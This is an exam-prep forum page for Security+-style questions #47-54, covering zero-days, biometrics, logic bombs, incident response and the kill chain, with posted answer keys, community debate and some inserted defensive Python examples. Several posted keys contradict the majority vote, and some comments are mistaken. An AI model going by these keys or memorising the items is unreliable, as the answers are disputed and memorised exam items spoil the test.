they subscribe to security feeds, they are only receiving information - they are not sharing any in return.
upvoted 10 times


Question #47 Topic 1

Which of the following is the MOST effective control against zero-day vulnerabilities?

A. Network segmentation

B. Patch management

C. Intrusion prevention system

D. Multiple vulnerability scanners

Correct Answer: C

Community vote distribution


A (72%) C (19%) 9%

Ay_ma Highly Voted 4 months, 2 weeks ago
Selected Answer: A
IPS can only protect against known host and application-based attacks and exploits. IPS inspects traffic against signatures and anomalies, it
does cover a broad spectrum of attack types, most of them signature-based, and signatures alone cannot protect against zero-day attacks.
(www.rawcode7.medium.com)

However, with network segmentation, you're able to isolate critical assets into different segments. And when a zero-day attack occurs, you're not
at risk of losing all and are able to isolate the attack's effect to one segment.
upvoted 14 times

beardsly Highly Voted 4 months, 2 weeks ago
Had to look this up myself as there is no real clear answer here. One of the Sec+ books I have suggested IPS and segmenting. Google search
even says IPS in this regard as well. I would personally say Network Segmentation but otherwise not sure. My comment is not all that helpful I
know but just wanted to throw my thoughts out there.
upvoted 14 times

TinyTrexArmz 2 days, 9 hours ago
I agree, there is no clear answer here. And though I don't think it's what the test would want us to answer I will say in my 20 years of IT
experience that a good Patch management process is the most helpful when it comes to zero-day exploits. I say this because once a Zero
Day becomes public knowledge then the vendor normally rushes to put out some kind of patch or workaround. Having a way to deploy that in
a quick and reliable manner is key to getting things back to secure as soon as possible.

But I would say IPS would be most effective against zero day vulnerabilities because you might be able to detect the usual traffic or activity.
Network segmentation will only help slow the intruder down. If you don't have anything to detect the oddity then the attacker could install a
back door and then work their way across the segments. What's the old saying? An ounce of prevention is worth a pound of cure. But in a
perfect world, both would be implemented. My vote is C.
upvoted 1 times

hieptran 3 weeks, 5 days ago
To be more clear, zero days is an unknown exploit. There are a few chances that the IPS will detect the attack payloads/signature. But
segregating the network would eventually prevent lateral movement even if the attacker has Remote Code Execution privilege on the
compromised server.
upvoted 4 times

DALLASCOWBOYS Most Recent 6 days, 8 hours ago
D. Employing multiple vulnerability scanners can detect some zero day exploits but not all. Patch management is another good answer, while it
won't prevent the attack, quickly applying patches and software upgrades can significantly reduce the risk of an attack.

The question says control not prevention.


D is the better answer because it can detect some zero-day exploits.

A web application firewall is one of the most effective ways to prevent zero day attacks, but that is not one of the answers listed.
upvoted 1 times

DALLASCOWBOYS 6 days, 8 hours ago
A. Network segmentation. I have changed my thoughts and agree Network segmentation, because it isolates it from all outside
communications with an air gap.
upvoted 1 times

Cber123 3 weeks, 4 days ago
IPS. IPS can either be signature-based or heuristic/behavioral/anomaly-based. The answer doesn't specify what the IPS configuration is, so we
can assume that it is a heuristic/behavioral/anomaly-based IPS. Network Segmentation is a solution, but it is not the best solution. It is always
better to prevent an attack from happening in the first place than it is to mitigate the impact of an attack after it has occurred.
upvoted 2 times

markus_was 4 weeks, 1 day ago
Selected Answer: B
B - I need to have the newest patches
upvoted 2 times

MortG7 3 weeks, 3 days ago
you can have all the patches in the world..they won't help you. They are called zero day because there is no patch for it..at least not at time of
exploitation
upvoted 8 times

mike47 1 month, 2 weeks ago
Selected Answer: A
A. Network Segmentation is the only answer. There is plenty of website information on this if you type "network segmentation zero day attack"
in the Google search. Additionally, a successful Zero Day attack is something that is hidden; it can only be mitigated to cause less damage,
as there are no vendor patches out there for it.
https://www.networkworld.com/article/2317169/segment-data-centers-to-prevent-zero-day-attacks.html
upvoted 2 times

JustInTime23 1 month, 4 weeks ago
My Sec+ instructor said that it was IPS, not because IPS can detect the actual zero day, but because the IPS will be able to identify that
something is wrong and then both alert and try to take action.
upvoted 2 times

tek7ila 2 months, 1 week ago
Selected Answer: A
It's an unknown vulnerability so IPS and others won't help. The only good answer is A.
upvoted 1 times

EubertT 2 months, 3 weeks ago
Intrusion Protection
While the precise methods of a zero-day exploit can’t be known in advance, a network intrusion protection system (NIPS) can monitor the firms’
network for unusual activity.

The advantage of NIPS over a traditional antivirus-only system is it does not rely on checking software against a known database of threats. This
means it does not need updates or patches to learn about the latest attacks. NIPS works by monitoring the day-to-day patterns of network
activity across the network.
https://cybriant.com/how-to-prevent-zero-day-attacks-in-5-steps/
upvoted 3 times

rodwave 2 months, 3 weeks ago
Selected Answer: A
Answer: Network segmentation

Network segmentation means you're isolating your network into smaller parts (segments). This can be helpful for providing unique control to each
of those segments. Cyber attacks can spread quickly and a large network just means a large attack surface for an attack to spread through.
Segmenting a network would isolate a zero-day attack to just that segment instead of losing an entire network, hopefully.

An issue with zero-day vulnerabilities is that they are so new that they are likely not going to be detected initially, so the option for IPS (C) or using
vulnerability scanner (D) would not be the most effective in preventing zero-day attacks. Option B would essentially mean having to wait for a
patch to be discovered for the vulnerability, so this option would not work either.
upvoted 1 times

Eric1212 2 months, 4 weeks ago
Selected Answer: C
From a CompTIA instructor, "the answer is C"
upvoted 2 times

VendorPTS 4 months ago
Selected Answer: C
C is the best choice here. The question asks what the most effective control against zero-day vulnerabilities is. Intrusion Prevention Systems (IPS)
both monitor the behavior and protect against activity outside of a defined/expected behavior via system hardening techniques, limiting attack
vectors. Obviously, a system would be safest from attack if it was turned off and inaccessible, but this isn't practical. The system must be booted
to function. This principle carries over to the idea of network segmentation. Often connectivity to other networks to function is required. While
network segmentation could help, it isn't a control that you can apply universally to all systems in all contexts in the way IPS is. IPS isn't always
and only signature-based as some have suggested. Just my two cents.
upvoted 7 times

db97 4 months, 1 week ago
IPS may detect by: signatures, anomaly behaviors, heuristics, etc.

I think this would be a potential correct answer.


upvoted 3 times

Halaa 4 months, 4 weeks ago
Selected Answer: A
MOST effective CONTROL


upvoted 5 times
[Removed] 5 months ago
Selected Answer: B
Patch Management.
upvoted 2 times

[Removed] 5 months ago
Actually, nevermind. Intrusion prevention system seems to be the best answer here.
upvoted 1 times

svet123 4 months, 3 weeks ago
This assumes the IPS is able to detect the Zero-Day, which most likely isn't possible since it is a brand new threat. I think it's A
upvoted 1 times

Jakalan7 4 months, 2 weeks ago
There's no way it's patch management, if it's a zero-day attack then it does not matter if your systems are patched or not. Zero-day attacks
have no official patch to fix the issue.
upvoted 8 times

xOdinx 5 months ago
Selected Answer: A
A - there are no signatures yet to observe in a zero-day
upvoted 5 times

Joe1984 5 months ago
Selected Answer: A
Don't IPS use signatures as well? Therefore there would not be one because it's zero-day. If a zero day hits one network, segmentation could help
contain it at least.
upvoted 6 times

stoneface 5 months ago
IPSs can also use behavioral or heuristic based protection.
upvoted 4 times

Ribeiro19 5 months ago
yes, if you use your baseline. Everything that is not your baseline of activity will raise a flag. But in this question they only say IPS, they do
not specify (heuristic behavior). So I am going to A, segmenting the LAN will increase the security (don't let the zero day spread by the network).
upvoted 1 times

xOdinx 5 months ago
But those heuristic patterns need to be observed before they can be added to a threat feed. A zero day would not have a signature.
upvoted 2 times

Ribeiro19 5 months ago
No, if you use your baseline. Everything that is not your baseline of activity will raise a flag. But in this question they only say IPS, they
do not specify (heuristic behavior). So I am going to A, segmenting the LAN will increase the security (don't let the zero day spread by the
network).
upvoted 1 times


Question #48 Topic 1

Which of the following is the GREATEST security concern when outsourcing code development to third-party contractors for an internet-facing
application?

A. Intellectual property theft

B. Elevated privileges

C. Unknown backdoor

D. Quality assurance

Correct Answer: C

Community vote distribution


C (88%) 12%

varun0 Highly Voted 5 months ago
Selected Answer: C
GREATEST security concern would be unknown backdoor
upvoted 11 times

ronniehaang Most Recent 4 days, 19 hours ago
Selected Answer: C
The greatest security concern when outsourcing code development to third-party contractors for an internet-facing application is the possibility
of an unknown backdoor. This is because a contractor may intentionally or unintentionally insert malicious code into the application that could
compromise the security and privacy of user data and the organization's systems. This risk is elevated if the contractor is not fully vetted, or if the
organization does not have adequate safeguards in place to ensure the security and integrity of the codebase. To mitigate this risk, the
organization should have strict security policies and procedures in place for outsourcing, including background checks for contractors, code
review and testing procedures, and continuous monitoring and incident response processes.
upvoted 1 times

DALLASCOWBOYS 6 days, 8 hours ago
C. I think Unknown Backdoor would be the GREATEST security concern and is the best answer. I do believe D is a very good answer because the
first step in risk assessment and mitigation is Quality Assurance.
upvoted 1 times

sonic1230 3 months, 3 weeks ago
Selected Answer: C
google
upvoted 2 times

Ay_ma 5 months ago
A- Intellectual Property Theft: I'm guessing by that point a legal contract is already on ground to mitigate such an issue.

Unknown Backdoor, in my opinion, is equivalent to a zero-day attack. You have no idea if these contractors knowingly or unknowingly put a
backdoor in your code.

Quality Assurance: I'm guessing that's why you hired them in the first place because you know they deliver quality service.
upvoted 3 times

comeragh 5 months ago
Selected Answer: C
GREATEST security concern - for me this would be C - Unknown Backdoor
upvoted 1 times


stoneface 5 months ago
Selected Answer: D
If you're outsourcing dev work, you probably have a contract with a legit company and you had probably also reviewed their documents and
AOC's and stuff.

Without good QA, there could be a purposeful OR unintended backdoor in the application if somebody was an incompetent developer

With good QA, ideally they would be doing automated security testing to look for a backdoor in the program.
upvoted 2 times

Sandon 2 weeks, 3 days ago
Bad Stoneface, bad
upvoted 2 times


Question #49 Topic 1

An organization has hired a red team to simulate attacks on its security posture. Which of the following will the blue team do after detecting an
IoC?

A. Reimage the impacted workstations.

B. Activate runbooks for incident response.

C. Conduct forensics on the compromised system.

D. Conduct passive reconnaissance to gather information.

Correct Answer: C

Community vote distribution


B (95%) 5%

varun0 Highly Voted 5 months ago
Selected Answer: B
Incident is detected, now incident response has to happen. Runbook describes everyone's roles during incident response.
upvoted 22 times

stoneface 5 months ago
agreed
upvoted 4 times

Wiggie Highly Voted 5 months ago
Selected Answer: B
B is correct
upvoted 6 times

ronniehaang Most Recent 4 days, 19 hours ago
Selected Answer: B
B. Activate runbooks for incident response.

After detecting an Indicator of Compromise (IoC), the blue team will activate runbooks for incident response. The purpose of runbooks is to have
a systematic, documented, and repeatable process to respond to security incidents. The blue team will use the runbooks to assess the scope of
the attack, contain it, and minimize damage. The runbooks will also help the blue team collect and preserve evidence, perform root cause
analysis, and restore normal operations. The blue team will take the information gathered from the runbooks and use it to improve the
organization's security posture.
upvoted 1 times

DALLASCOWBOYS 6 days, 8 hours ago
B. The blue team is the defense and will defend against the attack
upvoted 1 times

[Removed] 1 month, 3 weeks ago
Selected Answer: C
IoC = Forensics… Both answers seems fine but C answer could be right given the scenario (IoC).
upvoted 2 times

560exam 1 month, 4 weeks ago
Selected Answer: B
Indicator of Compromise (IOC): Analysts detect that the system has been compromised, next step is to activate run books. I'm going with B.
upvoted 2 times

NICKJONRIPPER (2 months, 2 weeks ago)
Selected Answer: B
The incident is found by the red team, not an actual attack, so it is time for forensics, not incident response.
upvoted 2 times

NICKJONRIPPER (2 months, 2 weeks ago)
C not B
upvoted 2 times

carpathia (2 months, 4 weeks ago)
Selected Answer: B
You don't do forensics in a red/blue team situation.

upvoted 2 times
babyzilla (3 months ago)
Anyone have an update to this? It's either B or C. Both are legit answers, but I'm not sure if this is an "order"-based question, as in runbooks have to be activated prior to conducting forensic analysis. Another poorly written question IMO.
upvoted 3 times

yasuke (3 months, 1 week ago)
IOC is digital evidence that a cyber incident has occurred. This intelligence is gathered by security teams in response to speculations of a
network breach or during scheduled security audits.

An Indicator of Attack (IOA), on the other hand, is any digital or physical evidence that a cyberattack is likely to occur.
upvoted 1 times

ozy_baba (4 months, 3 weeks ago)
Key words: "after detecting an IOC"
upvoted 1 times

RonWonkers (4 months, 3 weeks ago)
Selected Answer: B
I think B
upvoted 2 times

Question #50 Topic 1

An amusement park is implementing a biometric system that validates customers' fingerprints to ensure they are not sharing tickets. The park's owner values customers above all and would prefer customers' convenience over security. For this reason, which of the following features should the security team prioritize FIRST?

A. Low FAR

B. Low efficacy

C. Low FRR

D. Low CER

Correct Answer: C

Community vote distribution: C (100%)

varun0 (Highly Voted, 5 months ago)
Selected Answer: C
since convenience should be prioritized over security, FIRST priority should be low FRR
upvoted 13 times

ScottT (4 months, 3 weeks ago)
https://www.recogtech.com/en/knowledge-base/security-level-versus-user-convenience - FAR = False Acceptance. FRR = False Rejections
upvoted 3 times

stoneface (5 months ago)
concur
upvoted 3 times

Sklark (Highly Voted, 3 months, 2 weeks ago)
Could you imagine the uproar of a zoo storing fingerprint data?
upvoted 5 times

J_Ark1 (2 months, 1 week ago)
yes, all the habitats and species going bananas in their enclosures lol
upvoted 3 times

DALLASCOWBOYS (Most Recent, 6 days, 8 hours ago)
A. False Acceptance Rate means you are falsely accepting unauthorized users; therefore, the park owner wants to prioritize convenience over security. This will allow for convenience.

FRR would be falsely rejecting authorized users which would impact convenience.
upvoted 1 times

DALLASCOWBOYS (6 days, 8 hours ago)
C. Changing answer to Low FRR: as you decrease the false rejection rate you will increase the rate of false acceptance, therefore more convenience.
upvoted 1 times

i_m_Jatin (1 week ago)
Low FRR is a good answer
upvoted 1 times

rodwave (2 months, 3 weeks ago)
Selected Answer: C
Answer: Low FRR

There are two main metrics that are used to determine the performance of biometrics:

1. FAR (False Acceptance Rate)
2. FRR (False Rejection Rate)

False Acceptance Rate (FAR) is a metric for biometric performance that determines the number of instances where unauthorized persons were incorrectly authorized. False Rejection Rate (FRR) is a metric that determines the number of instances where an authorized person is incorrectly rejected.

If the emphasis is security, then make sure the False Acceptance Rate is low, as a low FAR means a lower possibility for someone to be authorized who shouldn't be. If the emphasis is convenience, then you'd want to make sure the False Rejection Rate is low, as a low FRR means a lower possibility for someone to be rejected who should be authorized.
upvoted 3 times
Tjank (4 months, 1 week ago)
Selected Answer: C
FAR (False Acceptance Rate)
FRR (False Rejection Rate)
CER (Crossover Error Rate), AKA EER (Equal Error Rate)

Since he is willing to sacrifice security for customer service, the best way to understand this is:
FAR has to go up in order for FRR to go down.
Typical business practice is in the middle of both, which would be near the CER.
upvoted 1 times
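A worked version of the trade-off Tjank and rodwave describe, added here as an example (not code from the original page or from any biometric vendor). It sweeps a decision threshold over constructed genuine and impostor match scores, computes FAR and FRR at each point, locates the crossover (CER/EER), and then picks the operating point a convenience-first owner would choose (cap FRR, accept whatever FAR results) next to the one a security-first owner would choose. The scores and the 10% budgets are assumptions for illustration; a real deployment would take the scores from enrolment trials.

```python
"""Biometric operating point: FAR, FRR and the crossover error rate (CER/EER).

Added illustration, not from the original page. The match scores below are
constructed (0 = no similarity, 1 = identical) to stand in for the scores a
fingerprint matcher would report during enrolment trials.
"""
from dataclasses import dataclass

# Constructed sample data: scores for genuine users matching their own template,
# and for impostors matching someone else's template.
GENUINE_SCORES = [0.91, 0.88, 0.85, 0.83, 0.80, 0.78, 0.76, 0.72, 0.70, 0.62]
IMPOSTOR_SCORES = [0.10, 0.22, 0.31, 0.40, 0.48, 0.55, 0.61, 0.68, 0.73, 0.77]


@dataclass(frozen=True)
class OperatingPoint:
    threshold: float
    far: float  # impostor attempts wrongly accepted / all impostor attempts
    frr: float  # genuine attempts wrongly rejected / all genuine attempts


def rates_at(threshold, genuine=GENUINE_SCORES, impostor=IMPOSTOR_SCORES):
    """A match is accepted when score >= threshold."""
    far = sum(s >= threshold for s in impostor) / len(impostor)
    frr = sum(s < threshold for s in genuine) / len(genuine)
    return OperatingPoint(threshold, far, frr)


def sweep(genuine=GENUINE_SCORES, impostor=IMPOSTOR_SCORES):
    """Evaluate every threshold that changes a decision, plus one above all scores."""
    candidates = sorted(set(genuine) | set(impostor) | {1.01})
    return [rates_at(t, genuine, impostor) for t in candidates]


def crossover(curve):
    """CER/EER: the threshold where FAR and FRR are closest to equal."""
    return min(curve, key=lambda p: abs(p.far - p.frr))


def convenience_first(curve, max_frr):
    """Park-owner policy: the TIGHTEST threshold that still keeps FRR within budget.

    Low FRR is the goal; raising the threshold any further would start turning
    away paying customers, so we stop exactly where the FRR budget is exhausted.
    """
    return max((p for p in curve if p.frr <= max_frr), key=lambda p: p.threshold)


def security_first(curve, max_far):
    """Opposite policy: the LOOSEST threshold that keeps FAR within budget."""
    return min((p for p in curve if p.far <= max_far), key=lambda p: p.threshold)


if __name__ == "__main__":
    curve = sweep()
    for p in curve:
        print(f"threshold {p.threshold:.2f}  FAR {p.far:.1f}  FRR {p.frr:.1f}")
    print("CER:", crossover(curve))
    print("convenience-first (FRR <= 10%):", convenience_first(curve, 0.10))
    print("security-first (FAR <= 10%):", security_first(curve, 0.10))
```

With these scores the convenience-first point sits below the CER and the security-first point above it, which is exactly the ordering Tjank describes: FAR and FRR move in opposite directions as the threshold slides, and the CER is the middle ground most deployments land on.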

banditring (4 months, 3 weeks ago)
why would an amusement park even do this?
upvoted 3 times

RobV (3 months, 3 weeks ago)
Disney World fingerprint-verifies guests.
upvoted 2 times

RonWonkers (4 months, 3 weeks ago)
For the same reason some dude in a math test buys 50 watermelons
upvoted 21 times

banditring (4 months, 1 week ago)
touché lol
upvoted 1 times

Wutan (4 months, 2 weeks ago)
awesome :D
upvoted 1 times

varun0 (5 months ago)
Low CER?
upvoted 2 times

varun0 (5 months ago)
Disregard this
upvoted 1 times

Question #51 Topic 1

Which of the following organizations sets frameworks and controls for optimal security configuration on systems?

A. ISO

B. GDPR

C. PCI DSS

D. NIST

Correct Answer: D

Community vote distribution: D (80%), A (20%)

varun0 (Highly Voted, 5 months ago)
Selected Answer: D
NIST, I guess
upvoted 10 times

Tjank (Highly Voted, 4 months, 1 week ago)
Both ISO and NIST have frameworks for standards.
When searching parts of the question ("sets frameworks and controls for optimal security configuration"), only NIST came up specifically.
I personally hate these types of questions, as I would utilize both to build from.
upvoted 6 times

rodwave (2 months, 3 weeks ago)
Agreed, not a huge fan of the question either. The question only mentions security, which both ISO and NIST would cover, but I would lean towards NIST as it's specifically for improving cybersecurity.
upvoted 1 times

ronniehaang (Most Recent, 4 days, 19 hours ago)
Selected Answer: D
D. NIST (National Institute of Standards and Technology) sets frameworks and controls for optimal security configuration on systems. NIST
provides guidelines, standards, and best practices for information security, including the development of security configuration baselines for
various technologies, such as operating systems and applications.
upvoted 1 times

DALLASCOWBOYS (6 days, 7 hours ago)
D. NIST (National Institute of Standards and Technology) is the standard used by organizations to establish the fundamental controls and processes needed for optimum cybersecurity.
upvoted 1 times

i_m_Jatin (1 week ago)
National Institute of Standards and Technology
upvoted 1 times

sanlibo (2 weeks, 2 days ago)
Selected Answer: D
https://sopa.tulane.edu/blog/NIST-cybersecurity-framework#:~:text=The%20National%20Institute%20of%20Standards,and%20how%20it%20is%20implemented.
upvoted 1 times

shitgod (1 month, 1 week ago)
The quality of this question is quite low...
upvoted 2 times

Knowledge33 (3 months, 2 weeks ago)
Selected Answer: D
ISO is for all standards, not only security, whereas NIST is only related to security.
upvoted 4 times

Wutan (4 months, 2 weeks ago)
Selected Answer: A
I'd also say it's ISO, as the question does not state any cybersecurity-related information, only general security.
upvoted 2 times

jmb335 (4 months, 2 weeks ago)
I think it's NIST; they created the CSF (Cybersecurity Framework) to help organizations manage risk.
upvoted 3 times

BM9904 (4 months, 3 weeks ago)
Selected Answer: A
I am saying A; after researching, only ISO explains controls.
NIST CSF – The US National Institute of Standards and Technology framework for improving critical infrastructure cybersecurity
CIS – The Center for Internet Security critical security controls
ISO/IEC 27001 and 27002 – The International Standards Organization frameworks for best practices around security management and controls
upvoted 2 times

BM9904 (4 months, 3 weeks ago)
There are many different frameworks; however, a few dominate the market, in addition to the Payment Card Industry Data Security Standard (PCI DSS).
upvoted 1 times

Question #52 Topic 1

An organization discovered files with proprietary financial data have been deleted. The files have been recovered from backup, but every time the Chief Financial Officer logs in to the file server, the same files are deleted again. No other users are experiencing this issue. Which of the following types of malware is MOST likely causing this behavior?

A. Logic bomb

B. Cryptomalware

C. Spyware

D. Remote access Trojan

Correct Answer: A

Community vote distribution: A (100%)

cozzmo (Highly Voted, 5 months ago)
Logic bomb: a set of instructions secretly incorporated into a program so that if a particular condition is satisfied they will be carried out, usually
with harmful effects.
upvoted 16 times

varun0 (5 months ago)
Agreed
upvoted 2 times

rodwave (Highly Voted, 2 months, 3 weeks ago)
Selected Answer: A
Answer: Logic Bomb

A logic bomb is inserted code that will intentionally set off a malicious function when specified conditions are met. In this question, the logic bomb could be related to the CFO logging in, as no other user is experiencing this issue.
==================================
Helpful info:
Cryptomalware - a type of ransomware that will encrypt a user's files and demand a ransom

Spyware - a form of malware that hides on your device, monitors activity and steals sensitive information.

Remote Access Trojan (RAT) - malware an attacker uses to remotely control an infected computer
upvoted 7 times

ronniehaang (Most Recent, 4 days, 19 hours ago)
Selected Answer: A
A. Logic bomb is most likely causing this behavior.

A logic bomb is a type of malware that triggers an action based on certain conditions. In this scenario, the files with proprietary financial data are
being deleted every time the Chief Financial Officer logs in to the file server, which is a clear indication of a logic bomb in action. This type of
malware is designed to cause harm to a target system and can have devastating effects, including data loss and system shutdown.
upvoted 1 times

DALLASCOWBOYS (6 days, 7 hours ago)
A. Logic bomb. The attack is triggered when certain conditions are met.
upvoted 1 times

xxxdolorxxx (1 week, 6 days ago)
Selected Answer: A
I'm saying A. The circumstance happens when a specific sequence of events takes place, i.e. a logic bomb.

B. Cryptomalware (no mention of crypto here)
C. Spyware (no mention of spying or ads)
D. Remote access Trojan (not really applicable here)
upvoted 1 times

nobodyridesforfree (3 months, 2 weeks ago)
Selected Answer: A
Logic bomb is correct, as it requires a specific action to occur.
upvoted 1 times

alayeluwa (3 months, 3 weeks ago)
Selected Answer: A
Logic bomb

If user-account = chief-financial-officer;
Execute bla bla bla
upvoted 3 times

Fastytop (3 months, 3 weeks ago)
A logic bomb is not a type of malware!!!
upvoted 1 times

VendorPTS (4 months ago)
Selected Answer: A
Logic bomb. Occurs upon meeting preset criteria (e.g. a particular user logging on).
upvoted 1 times

Gravoc (4 months, 2 weeks ago)
Logic bomb. When set criteria/conditions are met, something happens. The condition in this case is the files being accessed = erase.
upvoted 1 times
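Finding the trigger described in this question from the evidence side, as an added example (not code from the original page or from any product): the script walks constructed file-server audit events and asks, for each account, how often a deletion under that account follows its own logon within a short window. A bomb armed on the CFO's logon is the account where the answer is "every time", with the same files each time; the other accounts never reach that ratio. The event format, account names, file paths and the 120-second window are assumptions for illustration.

```python
"""Hunting a logon-triggered logic bomb in file-server audit events.

Added example, not from the original page. The audit lines are constructed and
simplified (ISO timestamp, event type, account, and for deletions the path); a
real file server's security log carries the same facts in a richer format.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed audit trail: every CFO logon is followed within seconds by
# deletion of the same two finance files; other accounts behave normally.
AUDIT_EVENTS = """\
2023-01-16T08:02:11 LOGON cfo
2023-01-16T08:03:40 DELETE cfo finance/Q4_forecast.xlsx
2023-01-16T08:03:41 DELETE cfo finance/board_pack.pdf
2023-01-16T08:15:00 LOGON analyst1
2023-01-16T09:30:22 LOGON cfo
2023-01-16T09:31:05 DELETE cfo finance/Q4_forecast.xlsx
2023-01-16T09:31:06 DELETE cfo finance/board_pack.pdf
2023-01-16T10:00:00 LOGON analyst2
2023-01-16T10:20:00 DELETE analyst2 finance/scratch.tmp
2023-01-17T08:01:00 LOGON cfo
2023-01-17T08:02:30 DELETE cfo finance/Q4_forecast.xlsx
""".splitlines()


@dataclass
class UserStats:
    logons: int = 0
    triggered: int = 0                       # logons followed by a deletion inside the window
    files: set = field(default_factory=set)  # what got deleted in those windows


def parse(lines):
    """Return (timestamp, kind, user, path-or-None) tuples in time order."""
    events = []
    for line in lines:
        parts = line.split(maxsplit=3)
        path = parts[3] if len(parts) > 3 else None
        events.append((datetime.fromisoformat(parts[0]), parts[1], parts[2], path))
    return sorted(events, key=lambda e: e[0])


def attribute_deletions(lines, window=timedelta(seconds=120)):
    """Per account: logons seen, and how many were followed by a deletion under
    that account within `window`. A bomb armed on one user's logon shows up as
    triggered == logons with a stable set of target files."""
    stats = defaultdict(UserStats)
    session = {}  # user -> [logon time, deletion already counted for this logon?]
    for ts, kind, user, path in parse(lines):
        if kind == "LOGON":
            stats[user].logons += 1
            session[user] = [ts, False]
        elif kind == "DELETE" and user in session:
            logon_ts, counted = session[user]
            if ts - logon_ts <= window:
                stats[user].files.add(path)
                if not counted:
                    stats[user].triggered += 1
                    session[user][1] = True
    return dict(stats)


def suspects(stats, min_logons=2):
    """Accounts whose every observed logon (at least min_logons of them) was followed by deletions."""
    return sorted(u for u, s in stats.items()
                  if s.logons >= min_logons and s.triggered == s.logons)


if __name__ == "__main__":
    stats = attribute_deletions(AUDIT_EVENTS)
    for user, s in sorted(stats.items()):
        print(f"{user:10} logons={s.logons} triggered={s.triggered} files={sorted(s.files)}")
    print("trigger-bound accounts:", suspects(stats))
```

The output points at the account whose session is the trigger, not necessarily at the person: the next step is to look at what runs in that user's logon path (logon scripts, scheduled tasks, startup items) on the file server, which is where the planted code will be.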

Question #53 Topic 1

A security analyst has identified malware spreading through the corporate network and has activated the CSIRT. Which of the following should the analyst do NEXT?

A. Review how the malware was introduced to the network.

B. Attempt to quarantine all infected hosts to limit further spread.

C. Create help desk tickets to get infected systems reimaged.

D. Update all endpoint antivirus solutions with the latest updates.

Correct Answer: B

Community vote distribution: B (100%)

varun0 (Highly Voted, 5 months ago)
Selected Answer: B
Quarantine to limit further spread
upvoted 14 times

DALLASCOWBOYS (Most Recent, 6 days, 7 hours ago)
B. Quarantine to limit the spread
upvoted 1 times

sauna28 (1 month, 3 weeks ago)
Selected Answer: B
Phases in the Incident Response Plan
1. Preparation: The organization plans out how they will respond to an attack; this can involve:
2. Identification: Detecting and determining whether an incident has occurred.
3. Containment: Once a threat has been identified, the organization must limit or prevent any further damage.
4. Eradication: The removal of the threat.
5. Recovery: Restoring systems affected by the incident.
6. Lessons Learned: Where the organization reviews their incident response and prepares for a future attack.
upvoted 1 times

rodwave (2 months, 3 weeks ago)
Selected Answer: B
Answer: Attempt to quarantine all infected hosts to limit further spread.

As soon as the malware is identified, incident response begins. The steps for incident response are:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, seeing where there can be improvements for a future incident.

In the scenario, the malware has already been identified, which means that we are past the Identification step. The next step would be to begin containment so as to limit the amount of damage the malware can cause, so quarantining infected hosts would be the best option here.
upvoted 3 times

lordguck (3 months ago)
This question is free for interpretation again :-( A is my bet, whereas B (containment)/C (recovery) could be right too. By activating the CSIRT, his duties regarding containment and recovery could be fulfilled/handed over and the analyst goes to "lessons learnt".
upvoted 1 times

Jossie_C (3 months ago)
Nope. Step 4 isn't urgent, unlike quarantining. It's like COVID: quarantine everyone infected, which is containment, then figure out what happened.
upvoted 1 times

RonWonkers (4 months, 3 weeks ago)
Selected Answer: B
Incident response cycle: step 2 identification > step 3 containment
upvoted 3 times

Question #54 Topic 1

During an incident response, an analyst applied rules to all inbound traffic on the border firewall and implemented ACLs on each critical server.
Following an investigation, the company realizes it is still vulnerable because outbound traffic is not restricted, and the adversary is able to
maintain a presence in the network.
In which of the following stages of the Cyber Kill Chain is the adversary currently operating?

A. Reconnaissance

B. Command and control

C. Actions on objective

D. Exploitation

Correct Answer: C

Community vote distribution: B (91%), other (9%)

stoneface (Highly Voted, 5 months ago)
Selected Answer: B
Command and control (C2)—establishment of outbound communications from a victim system for secure communications between victim and
adversary systems. Compromised hosts typically beacon out and await further instruction or exploit when higher order interaction or data
exchange is required. This is the hallmark of advanced persistent threat (APT) attacks and data exfiltration.
upvoted 18 times

varun0 (Highly Voted, 5 months ago)
Selected Answer: B
able to maintain a presence in the network = C2
upvoted 6 times

EricShon (Most Recent, 3 days, 8 hours ago)
Selected Answer: B
Command and control (C2 or C&C)—the weaponized code establishes an outbound channel to a remote server that can then be used to control
the remote access tool and possibly download additional tools to progress the attack.
upvoted 1 times

ronniehaang (4 days, 18 hours ago)
Selected Answer: B
The adversary is currently operating in the Command and Control (C2) stage of the Cyber Kill Chain. This stage is characterized by the adversary
establishing and maintaining persistent access to the target network, often through outbound traffic. By maintaining a presence in the network,
the adversary is able to receive instructions and exfiltrate data from the target network, even though inbound traffic is restricted.
upvoted 1 times

DALLASCOWBOYS (6 days, 7 hours ago)
Another tricky answer, but B is the best answer, as the question indicates the attacker still has a presence in the network. While the outbound port is still open for communication, which means the attacker could still exfiltrate data, which would suggest Actions on Objective, the question does not say the attacker is exfiltrating data.
upvoted 1 times

its_melly (1 month, 2 weeks ago)
Selected Answer: D
At this stage the installation of a remote access Trojan or backdoor on the victim system allows the adversary to maintain persistence inside the
environment.

https://www.usprotech.com/7-essential-steps-cybersecurity-kill-chain-
process/#:~:text=Step%205%3A%20INSTALLATION,maintain%20persistence%20inside%20the%20environment.
upvoted 1 times

Nome02 (2 months ago)
C2 is confirmed as the correct answer, as it is mentioned that the "adversary is able to maintain a presence in the network".
upvoted 1 times

bengy78 (2 months, 3 weeks ago)
They have it right, C. C2 (B) is for establishing the outbound connection; C, per CompTIA CertMaster, would be correct for transferring data: "7. Actions on objectives—in this phase, the attacker typically uses the access he has achieved to covertly collect information from target systems and transfer it to a remote system (data exfiltration). An attacker may have other goals or motives, however."
upvoted 1 times

rodwave (2 months, 3 weeks ago)
Selected Answer: B
Answer: Command and control

Command and control is when a data channel has to be established between a compromised host and the attacker's central control software so that the attacker will be able to remotely control the host. This is generally done from inside the target network.

Connections initiated from inside of the company network are, in most cases, allowed by the firewalls, but not vice versa. Generally you cannot connect from the outside so easily. So, in many documented attacks, identifying the command and control channel in firewall or DNS logs was actually the first proof that indicated the presence of compromised systems, and it's still one of the first methods of detecting APTs in your network.
upvoted 2 times
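The detection rodwave mentions, as an added example (not code from the original page or from any firewall vendor): with inbound traffic already locked down, the C2 channel lives in the unrestricted outbound connections, and an implant that beacons home gives itself away by its regularity. The script groups constructed firewall ALLOW lines by (source, destination, port) and flags flows whose inter-connection interval has very low jitter relative to its period, something interactive browsing to the same site does not show. The log format, the addresses (documentation ranges), the five-hit minimum and the 0.2 jitter cut-off are assumptions for illustration; real implants add deliberate jitter, so the cut-off is a tuning knob, not a constant.

```python
"""Spotting a command-and-control beacon in outbound firewall logs.

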